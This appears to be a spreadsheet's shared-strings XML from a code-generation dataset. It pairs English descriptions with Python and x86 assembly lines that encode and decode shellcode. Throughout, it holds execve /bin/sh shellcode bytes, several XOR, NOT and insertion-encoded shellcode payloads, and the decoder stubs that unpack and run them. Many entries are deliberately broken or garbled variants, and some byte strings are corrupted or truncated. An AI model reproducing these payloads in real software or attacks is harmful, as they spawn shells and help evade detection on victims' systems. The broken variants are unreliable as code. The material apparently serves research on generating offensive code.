    <t>shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'\xc0\x2\x2f\x2f\x2f\x2f\x62\x2f\x2f\x6e\x2</t>
  </si>
  <si>
    <t>random = random . randint ( 1 , 8 )</t>
  </si>
  <si>
    <t>encoded += '%02x' % random</t>
  </si>
  <si>
    <t>URL: http://shell-storm.org/shellcode/files/shellcode-902.php</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>import the sys package</t>
  </si>
  <si>
    <t>Declare a tuple shellcode and add the string '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' into it</t>
  </si>
  <si>
    <t>Set total to the number of command-line arguments</t>
  </si>
  <si>
    <t>total = len ( sys . argv )</t>
  </si>
  <si>
    <t>if total does not equal 2</t>
  </si>
  <si>
    <t>if total != 2 :</t>
  </si>
  <si>
    <t>output the string '!!Give the LEADER byte'</t>
  </si>
  <si>
    <t>output the string 'Script must run as: python xxx.py LEADER'</t>
  </si>
  <si>
    <t>display 'LEADER is any integer between 17-255'</t>
  </si>
  <si>
    <t>display 'e.g python Followtheleader.py 32'</t>
  </si>
  <si>
    <t>try</t>
  </si>
  <si>
    <t>try:</t>
  </si>
  <si>
    <t>set leader to the first command-line argument after casting it to an int</t>
  </si>
  <si>
    <t>leader = int ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it between the indicies 2 and 3, convert it to an int16 and add its value to the variable fb</t>
  </si>
  <si>
    <t>fb = int ( hex ( leader ) [ 2 : 3 ] , 16 )</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it at index 3, convert it to an int16 and set its value to the variable sb</t>
  </si>
  <si>
    <t>sb = int ( hex ( leader ) [ 3 : ] , 16 )</t>
  </si>
  <si>
    <t>set encoded to an empty string</t>
  </si>
  <si>
    <t>encoded = ' '</t>
  </si>
  <si>
    <t>set the variable encoded2 to an empty string</t>
  </si>
  <si>
    <t>encoded2 = ' '</t>
  </si>
  <si>
    <t>set encoded to the string '\\x'</t>
  </si>
  <si>
    <t>encoded = '\\x'</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it at the index of 2 and add its value to the variable encoded</t>
  </si>
  <si>
    <t>encoded += hex ( leader ) [ 2 : ]</t>
  </si>
  <si>
    <t>set encoded2 to the string '0x'</t>
  </si>
  <si>
    <t>encoded2 = '0x'</t>
  </si>
  <si>
    <t>Convert the value of leader to hexadecimal, then slice it at the index of 2 and add its value to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += hex ( leader ) [ 2 : ]</t>
  </si>
  <si>
    <t>set the variable i to 0</t>
  </si>
  <si>
    <t>i = 0</t>
  </si>
  <si>
    <t>add 1 to the value of i</t>
  </si>
  <si>
    <t>i += 1</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and store it in the variable hopcode</t>
  </si>
  <si>
    <t>hopcode = '%02x' % x</t>
  </si>
  <si>
    <t>cast the string hopcode to integer base 16 and save it into the variable Dec_hopcode</t>
  </si>
  <si>
    <t>Dec_hopcode = int ( hopcode , 16 )</t>
  </si>
  <si>
    <t>subtract Dec_hopecode from 255 and store the result in variable suplX</t>
  </si>
  <si>
    <t>suplX = 255 - Dec_hopcode</t>
  </si>
  <si>
    <t>get the hexadecimal value of suplX and reverse its order then store the value in rev_suplx</t>
  </si>
  <si>
    <t>rev_suplx = hex ( suplX ) [ : : - 1 ]</t>
  </si>
  <si>
    <t>subtract sb from fb and store the result in the variable subfs</t>
  </si>
  <si>
    <t>subfs = fb - sb</t>
  </si>
  <si>
    <t>Take the absolute value of subfs then convert subfs to an integer, then cast to a hexadecimal, slice the variable rev_suplx between the indicies 0 and 2 then cast rev_suplx to the type int16, store the value of the summation in the variable xxx</t>
  </si>
  <si>
    <t>xxx = hex ( int ( abs ( subfs ) ) + int ( rev_suplx [ 0 : 2 ] , 16 ) )</t>
  </si>
  <si>
    <t>Check if the length of xxx is greater than 4</t>
  </si>
  <si>
    <t>if len ( xxx ) &gt; 4 :</t>
  </si>
  <si>
    <t>print the string 'Overflow encoding.Try again!!!.'</t>
  </si>
  <si>
    <t>terminate the program</t>
  </si>
  <si>
    <t>else if xxx is equal to the string '0x0'</t>
  </si>
  <si>
    <t>elif xxx == '0x0':</t>
  </si>
  <si>
    <t>print the string 'A byte was Encoded as 0x00 .Try again!!!'</t>
  </si>
  <si>
    <t>slice the variable xxx at index 2 and add the value to the variable encoded</t>
  </si>
  <si>
    <t>encoded += xxx [ 2 : ]</t>
  </si>
  <si>
    <t>generate a random integer between 1 and 255 then convert the random number into a hexadecimal and store the value in insertByte</t>
  </si>
  <si>
    <t>insertByte = hex ( random . randint ( 1 , 255 ) )</t>
  </si>
  <si>
    <t>slice the variable insertByte at index 2 and add the value to the variable encoded</t>
  </si>
  <si>
    <t>encoded += insertByte [ 2 : ]</t>
  </si>
  <si>
    <t>add the string value ',' to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += ', '</t>
  </si>
  <si>
    <t>add the value of xxx to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += xxx</t>
  </si>
  <si>
    <t>slice the variable insertByte at index 2 and add the value to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += insertByte [ 2 : ]</t>
  </si>
  <si>
    <t>print the string ' *************'</t>
  </si>
  <si>
    <t>print the string ' LEADER BYTE :decimal(%d), HEX(0x%x)' along with the the variable leader and the second command-line argument</t>
  </si>
  <si>
    <t>output the string 'Len of Shellcode: %02d' along with the parameter i</t>
  </si>
  <si>
    <t>output the string '------------------------------------------------------------------------'</t>
  </si>
  <si>
    <t>output the string '   1. Style:= %s ' along with the parameter encoded</t>
  </si>
  <si>
    <t>output the string '   2. Style:= %s ' along with a parameter encoded2</t>
  </si>
  <si>
    <t>declare an except statement</t>
  </si>
  <si>
    <t>except:</t>
  </si>
  <si>
    <t>print the string 'exiting...'</t>
  </si>
  <si>
    <t>total = len ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>'fb = int ( hex ( leader ) [ 2 : ] , 16 )'</t>
  </si>
  <si>
    <t>'sb = int ( hex ( leader ) [ 3 : ] , 16 )'</t>
  </si>
  <si>
    <t>encoded2 = hex ( leader ) [ 2 : ]</t>
  </si>
  <si>
    <t>i += i + 1</t>
  </si>
  <si>
    <t>'Dec_hopcode = int ( hopcode , 16 )'</t>
  </si>
  <si>
    <t>suplX = 255 - Dec_hopecode</t>
  </si>
  <si>
    <t>subfs = fb - s</t>
  </si>
  <si>
    <t>'xxx = hex ( int ( abs ( subfs ) ) + int ( rev_suplx [ 0 : 2 ] , 16 ) )'</t>
  </si>
  <si>
    <t>if len ( x ) &gt; 4 :</t>
  </si>
  <si>
    <t>exit ( )</t>
  </si>
  <si>
    <t>elif x == '0x0':</t>
  </si>
  <si>
    <t>encoded += x [ 2 : ]</t>
  </si>
  <si>
    <t>'insertByte = hex ( random . randint ( 1 , 255 ) )'</t>
  </si>
  <si>
    <t>shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x6e\x6e\xe3\xe3\x89\xe2\xe2</t>
  </si>
  <si>
    <t>Dec_hopcode = int ( Dec_hopcode , 16 )</t>
  </si>
  <si>
    <t>temp = hex ( int ( abs ( subfs ) ) + int ( rev_suplx [ 0 : 2 ] , 16 ) )</t>
  </si>
  <si>
    <t>if len ( than ) &gt; 4 :</t>
  </si>
  <si>
    <t>elif '0x0' == var1:</t>
  </si>
  <si>
    <t>encoded += var0 [ 2 : ]</t>
  </si>
  <si>
    <t>encoded2 += encoded2</t>
  </si>
  <si>
    <t>offset = total sys.argv [1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump short to the call_decoder</t>
  </si>
  <si>
    <t>define the decoder function</t>
  </si>
  <si>
    <t>load the address of esi into edi</t>
  </si>
  <si>
    <t>lea edi, [esi]</t>
  </si>
  <si>
    <t>clear the eax and the ebx registers</t>
  </si>
  <si>
    <t>define the switch function</t>
  </si>
  <si>
    <t>switch:</t>
  </si>
  <si>
    <t>move the byte at the address esi + eax into bl</t>
  </si>
  <si>
    <t>mov bl, byte [esi + eax]</t>
  </si>
  <si>
    <t>jump to shellcode if bl is equal to 0xaa</t>
  </si>
  <si>
    <t>define xordecode</t>
  </si>
  <si>
    <t>xordecode:</t>
  </si>
  <si>
    <t>move the byte at the address esi + eax +1 into bl</t>
  </si>
  <si>
    <t>mov bl, byte [esi + eax + 1]</t>
  </si>
  <si>
    <t>move bl into the byte in edi and perform xor operation with 0xdd</t>
  </si>
  <si>
    <t>point to the next byte in edi</t>
  </si>
  <si>
    <t>inc edi</t>
  </si>
  <si>
    <t>add 3 to al</t>
  </si>
  <si>
    <t>add al, 3</t>
  </si>
  <si>
    <t>jump short to switch</t>
  </si>
  <si>
    <t>jmp short switch</t>
  </si>
  <si>
    <t>notdecode function</t>
  </si>
  <si>
    <t>notdecode:</t>
  </si>
  <si>
    <t>move bl into the byte in edi and negate the result</t>
  </si>
  <si>
    <t>increment edi</t>
  </si>
  <si>
    <t>define call_decoder</t>
  </si>
  <si>
    <t>call_decoder:</t>
  </si>
  <si>
    <t>call the decoder function</t>
  </si>
  <si>
    <t>shellcode is array of bytes 0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa</t>
  </si>
  <si>
    <t>shellcode: db 0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa</t>
  </si>
  <si>
    <t xml:space="preserve">_start: </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp call_decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor eax, eax</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ebx, ebx</t>
  </si>
  <si>
    <t>xor ebx, ebx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp bl, 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jump to xordecode if bl is equal to 0xbb else jump to notdecode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp bl, 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp notdecode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz xordecode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor byte [edi], 0xdd</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">mov byte [edi], bl </t>
  </si>
  <si>
    <t xml:space="preserve">mov byte [edi], bl </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>not byte [edi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decoder :</t>
  </si>
  <si>
    <t>'lea edi , [esi]'</t>
  </si>
  <si>
    <t>switch :</t>
  </si>
  <si>
    <t>xordecode :</t>
  </si>
  <si>
    <t>jmp short shell</t>
  </si>
  <si>
    <t>call notdecode</t>
  </si>
  <si>
    <t>call_decoder :</t>
  </si>
  <si>
    <t>_start :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short call_decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp bl , 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lea edi , [esi]</t>
  </si>
  <si>
    <t>mov bl , byte [esi+eax]</t>
  </si>
  <si>
    <t>mov bl , byte [esi+eax +1]</t>
  </si>
  <si>
    <t>mov byte [edi] , bl</t>
  </si>
  <si>
    <t>add al , 3</t>
  </si>
  <si>
    <t>jmp short cycle</t>
  </si>
  <si>
    <t>notdecode :</t>
  </si>
  <si>
    <t>mul ebx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ebx , ebx</t>
  </si>
  <si>
    <t>xor ebx , ebx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>je shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp xordecode , bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>je 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">mov byte [edi] , bl </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">load the address at esi + 13 into edi </t>
  </si>
  <si>
    <t>clear ecx and eax</t>
  </si>
  <si>
    <t>point edx to the stack pointer</t>
  </si>
  <si>
    <t>move 13 to cl</t>
  </si>
  <si>
    <t>function decode</t>
  </si>
  <si>
    <t>get the byte from esi and save it in bl</t>
  </si>
  <si>
    <t>decrease ebx by 1</t>
  </si>
  <si>
    <t>move bl into the byte in edx + eax</t>
  </si>
  <si>
    <t>point to the next byte in eax</t>
  </si>
  <si>
    <t>get the byte from edi and save it in bl</t>
  </si>
  <si>
    <t>move bl into the byte at the address edx + eax</t>
  </si>
  <si>
    <t>decrement the counter and jump to decode if not zero else jump to edx</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>define the call_shellcode function and call decoder</t>
  </si>
  <si>
    <t>define the array of bytes encodedshellcode and initialize to 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce</t>
  </si>
  <si>
    <t>lea edi, [esi + 13]</t>
  </si>
  <si>
    <t>mov edx, esp</t>
  </si>
  <si>
    <t>mov cl, 13</t>
  </si>
  <si>
    <t>mov bl, byte [esi]</t>
  </si>
  <si>
    <t>dec ebx</t>
  </si>
  <si>
    <t>mov byte [edx + eax], bl</t>
  </si>
  <si>
    <t>inc eax</t>
  </si>
  <si>
    <t>mov bl, byte [edi]</t>
  </si>
  <si>
    <t>encodedshellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce</t>
  </si>
  <si>
    <t>jmp short call_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pop esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mul ecx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp edx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_shellcode:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decode :</t>
  </si>
  <si>
    <t>'mov bl , byte [esi]'</t>
  </si>
  <si>
    <t>call_shellcode :</t>
  </si>
  <si>
    <t xml:space="preserve">_start : </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decoder :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loopnz decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lea edi , [esi+13]</t>
  </si>
  <si>
    <t>mov edx , esp</t>
  </si>
  <si>
    <t>mov cl , 13</t>
  </si>
  <si>
    <t>sub ebx , 1</t>
  </si>
  <si>
    <t>mov byte [edx+eax] , bl</t>
  </si>
  <si>
    <t>encodedshellcode : db 0x32 , 0x51 , 0x30 , 0x74 , 0x69 , 0x63 , 0x6f , 0xe4 , 0x8a , 0x54 , 0xe2 , 0x0c , 0x81 , 0xc1 , 0x69 , 0x30 , 0x69 , 0x30 , 0x6a , 0x8a , 0x51 , 0xe3 , 0x8a , 0xb1 , 0xce</t>
  </si>
  <si>
    <t xml:space="preserve">decoder : </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_shellcode :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call var1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>load the address of esi+0x1 into edi</t>
  </si>
  <si>
    <t>lea edi, [esi+0x1]</t>
  </si>
  <si>
    <t>clear the eax register and move 0x1 in the lowest byte of the register</t>
  </si>
  <si>
    <t>zero out the ebx register</t>
  </si>
  <si>
    <t>decode function</t>
  </si>
  <si>
    <t>move the byte at the address esi+eax*1 into bl</t>
  </si>
  <si>
    <t>mov bl, byte [esi+eax*1]</t>
  </si>
  <si>
    <t>perform xor between bl and 0xaa and jump to encodedshellcode if the result is not zero</t>
  </si>
  <si>
    <t>move the byte at the address esi+eax*1+0x1 into bl and move bl into the byte in edi</t>
  </si>
  <si>
    <t>add 0x2 to al</t>
  </si>
  <si>
    <t>add al, 0x2</t>
  </si>
  <si>
    <t>jump to decode</t>
  </si>
  <si>
    <t>jmp decode</t>
  </si>
  <si>
    <t>define call_decoder and call decoder function</t>
  </si>
  <si>
    <t>define the array of bytes encodedshellcode and initialize to \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb</t>
  </si>
  <si>
    <t>encodedshellcode: db \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb</t>
  </si>
  <si>
    <t>define the decoder function and store the encoded shellcode pointer in the esi register</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov al, 0x1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jne encodedshellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor bl, 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov byte [edi], bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl, byte [esi+eax*1+0x1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">call_decoder: </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call decode</t>
  </si>
  <si>
    <t>encodedshellcode : db ë ^~_x0001_1À°_x0001_1Û _x0006_óªu_x0010_\_x0006__x0001_ G_x0004__x0002_ëíèÞÿÿÿ1ªÀªPªhª/ª/ªsªhªhª/ªbªiªnªªãªPªªâªSªªáª°ª ªÍªª»»</t>
  </si>
  <si>
    <t>xor eax , eax</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor bl , bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov byte [bl] , esi+eax*1+0x1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call function_1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_decoder :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lea edi , [esi+0x1]</t>
  </si>
  <si>
    <t>dec decode</t>
  </si>
  <si>
    <t>mov bl , byte [esi+eax*1]</t>
  </si>
  <si>
    <t>add al , 0x2</t>
  </si>
  <si>
    <t>mov al , 0x1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jnz encodedshellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor bl , 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">mov bl , byte [esi+eax*1+0x1] </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump to the call_decoder</t>
  </si>
  <si>
    <t>zero out the ecx register and move 0x19 into the lower byte of the register</t>
  </si>
  <si>
    <t>define the decode function and perform the xor operation between the byte in esi and the 0xaa value</t>
  </si>
  <si>
    <t>decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the shellcode label</t>
  </si>
  <si>
    <t>define the call_decoder label and call the decoder function</t>
  </si>
  <si>
    <t>define the array of bytes shellcode and initialize it to 0xeb,0x0d,0x5e,0x31,0xc9,0xb1,0x19,0x80,0x36,0xaa,0x46,0xe2,0xfa,0xeb,0x05,0xe8,0xee,0xff,0xff,0xff,0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a</t>
  </si>
  <si>
    <t>shellcode: db 0xeb,0x0d,0x5e,0x31,0xc9,0xb1,0x19,0x80,0x36,0xaa,0x46,0xe2,0xfa,0xeb,0x05,0xe8,0xee,0xff,0xff,0xff,0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a</t>
  </si>
  <si>
    <t>mov cl, 0x19</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor byte [esi], 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decode:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_decoder:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ecx , ecx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop ecx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode : db 0xeb , 0x0d , 0x5e , 0x31 , 0xc9 , 0xb1 , 0x19 , 0x80 , 0x36 , 0xaa , 0x46 , 0xe2 , 0xfa , 0xeb , 0x05 , 0xe8 , 0xee , 0xff , 0xff , 0xff , 0x9b , 0x6a , 0xfa , 0xc2 , 0x85 , 0x85 , 0xd9 , 0xc2 , 0xc2 , 0x85 , 0xc8 , 0xc3 , 0xc4 , 0x23 , 0x49 , 0xfa , 0x23 , 0x48 , 0xf9 , 0x23 , 0x4b , 0x1a , 0xa1 , 0x67 , 0x2a</t>
  </si>
  <si>
    <t>mov cl , 0x19</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor byte [esi] , 0xaa</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decode :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">loop decode </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the decode function and negate the byte in esi</t>
  </si>
  <si>
    <t>decrement the ecx register and jump to the decode label if the contents of the ecx register is not zero else jump short to the encodedshellcode label</t>
  </si>
  <si>
    <t>define the array of bytes encodedshellcode and initialize it to 0xeb,0x0c,0x5e,0x31,0xc9,0xb1,0x19,0xf6,0x16,0x46,0xe2,0xfb,0xeb,0x05,0xe8,0xef,0xff,0xff,0xff,0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f</t>
  </si>
  <si>
    <t>encodedshellcode: db 0xeb,0x0c,0x5e,0x31,0xc9,0xb1,0x19,0xf6,0x16,0x46,0xe2,0xfb,0xeb,0x05,0xe8,0xef,0xff,0xff,0xff,0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f</t>
  </si>
  <si>
    <t>jmp encodedshellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop encodedshellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encodedshellcode : db 0xeb , 0x0c , 0x5e , 0x31 , 0xc9 , 0xb1 , 0x19 , 0xf6 , 0x16 , 0x46 , 0xe2 , 0xfb , 0xeb , 0x05 , 0xe8 , 0xef , 0xff , 0xff , 0xff , 0xce , 0x3f , 0xaf , 0x97 , 0xd0 , 0xd0 , 0x8c , 0x97 , 0x97 , 0xd0 , 0x9d , 0x96 , 0x91 , 0x76 , 0x1c , 0xaf , 0x76 , 0x1d , 0xac , 0x76 , 0x1e , 0x4f , 0xf4 , 0x32 , 0x7f</t>
  </si>
  <si>
    <t>jmp short ecx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop decrypt</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump short to enc</t>
  </si>
  <si>
    <t>decoder function</t>
  </si>
  <si>
    <t>zero out eax and edx registers</t>
  </si>
  <si>
    <t>store the shellcode in esi and move it into cx</t>
  </si>
  <si>
    <t>point to the next word in esi</t>
  </si>
  <si>
    <t>move the contents of the address stored in esi into the bx register</t>
  </si>
  <si>
    <t>mov bx, [esi]</t>
  </si>
  <si>
    <t>'mov bx , [esi]'</t>
  </si>
  <si>
    <t>push the stack onto esi and move the contents on edi</t>
  </si>
  <si>
    <t>main function</t>
  </si>
  <si>
    <t>main:</t>
  </si>
  <si>
    <t>move the contents at the address stored in esi into the ax register</t>
  </si>
  <si>
    <t>mov ax, [esi]</t>
  </si>
  <si>
    <t>'mov ax , [esi]'</t>
  </si>
  <si>
    <t>perform xor between ax and bx and jump to call decoded if the result is zero</t>
  </si>
  <si>
    <t>shift right ax by the contents of cl and negate the word in ax</t>
  </si>
  <si>
    <t>move the contents of the al register into the address pointed by edi</t>
  </si>
  <si>
    <t>mov [ edi ] , al</t>
  </si>
  <si>
    <t>'mov edi , al'</t>
  </si>
  <si>
    <t>jump short to main</t>
  </si>
  <si>
    <t>jmp short main</t>
  </si>
  <si>
    <t>define call_decoded and execute it</t>
  </si>
  <si>
    <t>define enc function and call decoder</t>
  </si>
  <si>
    <t>enc :</t>
  </si>
  <si>
    <t>define encoded as array of words 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539</t>
  </si>
  <si>
